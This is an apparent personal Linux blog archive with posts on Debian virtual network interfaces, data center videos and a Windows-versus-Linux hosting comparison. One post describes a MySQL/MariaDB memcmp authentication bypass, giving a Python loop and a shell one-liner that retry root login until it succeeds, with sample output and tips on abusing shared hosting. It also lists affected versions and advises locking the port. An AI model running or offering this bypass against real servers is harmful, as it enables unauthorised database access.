web analytics

Cat Can Talk!

You don’t believe? I am a cat, and I am talking to you now!

Archive for the ‘Ubuntu’ Category

Debian Logo

As a Linux user, and a Debian lover, I tends to use the OS using commands a lot.
Why not use Ubuntu? I use Ubuntu on my desktops, and on servers, I prefer Debian or CentOS.
Anyway, in Linux, not everything you can do it quickly and in a simple way using the GUI.
CLI is always the best way to do most of the things you want.
This post, I will teach you how to create a virtual network interface in your Debian based Linux, which means, Ubuntu users can use this as well.

Debian based Linux store the network interface config in the file /etc/network/interfaces.
No, it is not in /etc/sysconfig/network-scripts/. Only Red Hat family distro use this.

By default, you might see the entries such as below in your /etc/network/interfaces.

auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
address 192.168.1.5
netmask 255.255.255.0
gateway 192.168.1.254

Just edit it using nano or vi, or if you have a desktop GUI, you can use your preferred text editor instead.
Things that you need to add, is as below for an additional virtual network interface.

auto eth0:1
iface eth0:1 inet static
address 192.168.1.6
netmask 255.255.255.0
broadcast 255.255.255.0
gateway 192.168.1.254

So the file, will become as below:

auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
address 192.168.1.5
netmask 255.255.255.0
gateway 192.168.1.254

auto eth0:1
iface eth0:1 inet static
address 192.168.1.6
netmask 255.255.255.0
broadcast 255.255.255.0
gateway 192.168.1.254

After you have done this, just restart the network using the command:

/etc/init.d/networking restart

Or if your OS is using NetworkManager, use the command below:

/etc/init.d/NetworkManager restart

If you prefer to use the “service” command, just go ahead with:

service networking restart

or for NetworkManager:

service NetworkManager restart

No reboot is required.


Ever wonder how izzit looks like underneath the interface of your Android phone?
Here is how it looks like, inside my Samsung Galaxy 5 running Cyanogenmod 7.2, which is Android Gingerbread (2.3.7).
android shell

MySQL Logo

Well, it is funny that when you try to attempt to login into mysql(with CLI) root user with the wrong password for 300 to 512 times, it will just finally just you login as the root user, with the wrong password.

Vulnerable versions of MySQL and MariaDB are those compiled with libraries that return integers outside the -128 to 127 range for memcmp. According to Golubchik the gcc built in memcmp and BSD libc memcmp are safe, but the linux glibc sse-optimised memcmp is not safe.

Official builds from MySQL(Oracle), MariaDB are believe to be not vulnerable, but up to 5.1.61, 5.2.11, 5.3.5 and 5.5.22, are potentially vulnerable.
5.1.63 and 5.5.24, which was just release recently have been verified that they do not have this hole.

Perhaps the proverb “When you fail, try again. Try harder until you success” is true after all in MySQL.
LOL

I’ve read from here, it shows you how to gain the root access of MySQL, using just a 1 line command python script.

#!/usr/bin/python
import subprocess

while 1:
subprocess.Popen(“mysql -u root mysql –password=blah”, shell=True).wait()

Below running the command:

relik@stronghold:~# python mysql_bypass.py
ERROR 1045 (28000): Access denied for user ‘root’@’localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@’localhost’ (using password: YES)
(The same shits happens for around 300 over times between these)
ERROR 1045 (28000): Access denied for user ‘root’@’localhost’ (using password: YES)
ERROR 1045 (28000): Access denied for user ‘root’@’localhost’ (using password: YES)
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 24598
Server version: 5.1.62-0ubuntu0.11.10.1 (Ubuntu)

Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

mysql>

And if you prefer to just do it manually inside the shell, you may want to try this as well.

$ for i in `seq 1 512`; do echo ‘select @@version;’ | mysql -h 127.0.0.1 -u root mysql –password=X 2>/dev/null && break; done

How To Fuck The Hole?
So, in order to exploit this hole, the attacker must have access to the MySQL server. Or at least, any type of account on the server, such as shell account or a hosting account.
So if your MySQL port is open for remote access, there are very high possibility that you are fucked!

If you currently having a shared hosting account, you might be able to screw the host off with several ways below:
1. If the host did not disable shell_exec, then you can actually upload an AJAX shell script to play with it.
2. shell_exec disabled? But you can create a cron? Then upload a bash script and let the cron execute the bash script to do the work for you.
And be expected that the host ban your ass after you play with this shit.

I Am Using MySQL Too! So, Am I Fucked!?
Well, it depends.
According to what I read from here, not all Linux distros are affected.
According to HD Moore, the only affected distros that are found to have the fucked versions of MySQL in their repo are as below:
1. Ubuntu 64bit (10.04, 10.10, 11.04, 11.10 and 12.04) Start from 1 LTS version, until the latest LTS version.
2. OpenSuSE 12.1 64-bit (So far only 1 version found to have hole.)
3. Fedora 16 64-bit (So far only 1 version found to have hole.)
4. Arch Linux

So, MySQL from which distro’s repo are proven to be safe at the moment?
They are as below:
1. Debian (Yeah! Luke, I am your father! )
2. RHEL (Well, still worth to pay for its subscription in this case.)
3. CentOS (The exact same thing as RHEL without need to pay a single cent, so I take back my words at the line above.)
4. Gentoo (Well, it is indeed very solid.)
5. All other distros.

So far only builds from 4 distros listed at above are found to be fucked without condom, so, I am very sure that I am not fucked, as I don’t use any of those 4 affected distros in any of my servers at the moment.

If you are not hosting other people in your server, please lock your MySQL port to be accessing from outside.
If you are leaving the port open, then please tell me which distro you are using for your server and tell me its IP, I go and pay you a visit.

Katie Kitty Chin liked this post

Just watched some video in Youtube, and found that it is quite interesting, so I just share it here.
As you all know, the most busy websites on the Internet, are Google and Facebook.

The videos below, are showing their main data center.
And no, they do not use only 1 data center, they have servers around the world, and the videos below, are only showing their main data center only.

Facebook Data Center

Google Data Center

Win vs Lin

In this post, I am not going to write too much.
I am just going to show some examples according to the reality, based on the requirement need by Windows 2008 R2 and latest versions of Linux/BSD distros.

The mission: Deploy a webserver to host PHP, MySQL, Apache/IIS. To host 10 WordPress websites which will be accepting 1000 unique visit a day each. Total will be accepting 5000+ unique visit and more than at least 20k pageloads a day.

Server Specifications:
Core2Quad Q8200 Quad Core 2.33Ghz
1333FSB (4MB Cache)
2GB DDR2 RAM
250GB SATA Hard Disk
4TB Monthly Bandwidth
5 IP Addresses
100mbps port
US$80/Month
Price and specs according to dedicated server plan 4 at http://cs-squad.net/whmcs-2/?ccce=cart&a=add&pid=17

What Windows Sysadmin will say:
2GB RAM!?
Are you nuts!?
It is just barely enough to just for the Windows 2008 R2 alone!
And you want to use it to host IIS, MySQL and PHP huh!?
And to host 10 websites!?
Are you out of your mind!?

What Linux Sysadmin will say:
Hmm… 2GB of RAM… Just the right amount of RAM to host 10 WordPress websites.
I just need to yum/apt-get what I need, and viola! Jobs done!
Will these 10 websites going to need innodb?
If innodb is not required, perhaps I am going to disable innodb in the mysql.ini and host several more websites in this server.

What BSD Sysadmin will say:
I believe, 2GB RAM will be more than enough for 10 WordPress websites.
As long as everything compiled nicely, I don’t think I need to worry about the server anymore, unless there are hardware issues or there is any patch to update.

Elizabeth Toh liked this post